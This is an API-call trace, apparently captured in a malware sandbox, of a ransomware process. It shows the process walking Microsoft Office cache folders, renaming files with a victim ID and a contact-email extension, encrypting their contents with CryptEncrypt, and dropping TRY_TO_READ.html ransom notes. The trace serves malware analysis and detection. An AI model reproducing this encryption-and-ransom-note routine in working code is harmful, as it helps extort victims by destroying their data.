	[0069.528] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0069.544] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c
	[0069.544] GetProcessHeap () returned 0x540000
	[0069.544] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0069.544] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=43806141) returned 1
	[0069.544] SetFilePointer (in: hFile=0x46c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x29c6dbd
	[0069.544] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0069.544] GetProcessHeap () returned 0x540000
	[0069.544] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0069.544] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0069.545] WriteFile (in: hFile=0x46c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0069.547] WriteFile (in: hFile=0x46c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0069.547] WriteFile (in: hFile=0x46c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0069.547] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x29c6dbd) returned 0x3a20020
	[0069.549] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x29c6dbd) returned 0x63f0020
	[0069.550] SetFilePointer (in: hFile=0x46c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0069.550] ReadFile (in: hFile=0x46c, lpBuffer=0x3a20020, nNumberOfBytesToRead=0x29c6dbd, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0x29c6dbd, lpOverlapped=0x0) returned 1
	[0074.786] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0074.786] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0074.786] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1
	[0075.132] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73
	[0075.132] GetProcessHeap () returned 0x540000
	[0075.132] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x5db2f0
	[0075.132] lstrcpyW (in: lpString1=0x5db2f0, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml"
	[0075.132] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0075.132] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0075.134] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c
	[0075.134] GetProcessHeap () returned 0x540000
	[0075.134] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db2f0 | out: hHeap=0x540000) returned 1
	[0075.134] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=2424) returned 1
	[0075.135] SetFilePointer (in: hFile=0x46c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x978
	[0075.135] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0075.135] GetProcessHeap () returned 0x540000
	[0075.135] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0075.135] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0075.135] WriteFile (in: hFile=0x46c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0075.140] WriteFile (in: hFile=0x46c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0075.141] WriteFile (in: hFile=0x46c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0075.141] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x978) returned 0x5db2f0
	[0075.141] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x978) returned 0x5dbc70
	[0075.141] SetFilePointer (in: hFile=0x46c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0075.141] ReadFile (in: hFile=0x46c, lpBuffer=0x5db2f0, nNumberOfBytesToRead=0x978, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db2f0*, lpNumberOfBytesRead=0x3a1f778*=0x978, lpOverlapped=0x0) returned 1
	[0075.141] SetFilePointer (in: hFile=0x46c, lDistanceToMove=-2424, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0075.141] WriteFile (in: hFile=0x46c, lpBuffer=0x5dbc70*, nNumberOfBytesToWrite=0x978, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5dbc70*, lpNumberOfBytesWritten=0x3a1f778*=0x978, lpOverlapped=0x0) returned 1
	[0075.141] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db2f0 | out: hHeap=0x540000) returned 1
	[0075.141] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5dbc70 | out: hHeap=0x540000) returned 1
	[0075.141] CloseHandle (hObject=0x46c) returned 1
	[0075.142] GetProcessHeap () returned 0x540000
	[0075.142] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0075.142] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0075.142] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0075.142] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db248 | out: hHeap=0x540000) returned 1
	[0075.142] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db1a0 | out: hHeap=0x540000) returned 1
	[0075.142] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x90) returned 0x5db1a0
	[0075.142] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b300 | out: hHeap=0x540000) returned 1
	[0075.142] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589090 | out: hHeap=0x540000) returned 1
	[0075.142] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a58a0 | out: hHeap=0x540000) returned 1
	[0075.142] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9e79670, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e79670, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da170
	[0075.142] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0075.142] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0075.142] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589090
	[0075.143] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0075.143] GetLastError () returned 0x0
	[0075.143] FindNextFileW (in: hFindFile=0x5da170, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9e79670, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e79670, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0075.143] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0075.143] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0075.143] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589090
	[0075.143] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0075.143] GetLastError () returned 0x0
	[0075.143] FindNextFileW (in: hFindFile=0x5da170, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.en", cAlternateFileName="")) returned 1
	[0075.143] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0075.143] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0075.143] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589090
	[0075.143] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0075.143] GetLastError () returned 0x0
	[0075.143] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x470
	[0075.144] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db3a8 | out: hHeap=0x540000) returned 1
	[0075.144] WriteFile (in: hFile=0x470, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0075.147] WriteFile (in: hFile=0x470, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0075.147] WriteFile (in: hFile=0x470, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0075.147] CloseHandle (hObject=0x470) returned 1
	[0075.147] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db2e0 | out: hHeap=0x540000) returned 1
	[0075.147] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0075.147] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0075.147] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db238 | out: hHeap=0x540000) returned 1
	[0075.147] FindNextFileW (in: hFindFile=0x5da170, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.es", cAlternateFileName="")) returned 1
	[0075.147] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0075.147] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0075.147] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589090
	[0075.147] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0075.147] GetLastError () returned 0x0
	[0075.148] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x470
	[0075.148] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db450 | out: hHeap=0x540000) returned 1
	[0075.148] WriteFile (in: hFile=0x470, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0075.150] WriteFile (in: hFile=0x470, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0075.150] WriteFile (in: hFile=0x470, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0075.150] CloseHandle (hObject=0x470) returned 1
	[0075.150] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db388 | out: hHeap=0x540000) returned 1
	[0075.150] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0075.150] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0075.150] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db2e0 | out: hHeap=0x540000) returned 1
	[0075.150] FindNextFileW (in: hFindFile=0x5da170, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.fr", cAlternateFileName="")) returned 1
	[0075.150] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0075.150] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0075.150] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589090
	[0075.151] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0075.151] GetLastError () returned 0x0
	[0075.151] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x470
	[0075.151] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db4f8 | out: hHeap=0x540000) returned 1
	[0075.151] WriteFile (in: hFile=0x470, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0075.152] WriteFile (in: hFile=0x470, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0075.152] WriteFile (in: hFile=0x470, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0075.152] CloseHandle (hObject=0x470) returned 1
	[0075.152] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db430 | out: hHeap=0x540000) returned 1
	[0075.152] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0075.152] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0075.152] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db388 | out: hHeap=0x540000) returned 1
	[0075.152] FindNextFileW (in: hFindFile=0x5da170, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40650500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x40650500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf0126df0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proofing.msi", cAlternateFileName="")) returned 1
	[0075.152] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0075.152] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0075.152] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589090
	[0075.152] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0075.152] GetLastError () returned 0x0
	[0075.152] FindNextFileW (in: hFindFile=0x5da170, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x32b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proofing.xml", cAlternateFileName="")) returned 1
	[0075.152] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0075.152] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0075.152] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589090
	[0075.152] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0075.153] GetLastError () returned 0x0
	[0075.153] FindNextFileW (in: hFindFile=0x5da170, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1
	[0075.153] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0075.153] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0075.153] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589090
	[0075.153] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0075.153] GetLastError () returned 0x0
	[0075.153] FindNextFileW (in: hFindFile=0x5da170, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9e79670, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9e79670, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e9f7d0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0075.153] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0075.153] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0075.153] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589090
	[0075.153] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0075.153] GetLastError () returned 0x0
	[0075.153] FindNextFileW (in: hFindFile=0x5da170, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9e79670, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9e79670, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e9f7d0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0075.153] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db580
	[0075.153] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0075.153] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0075.153] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
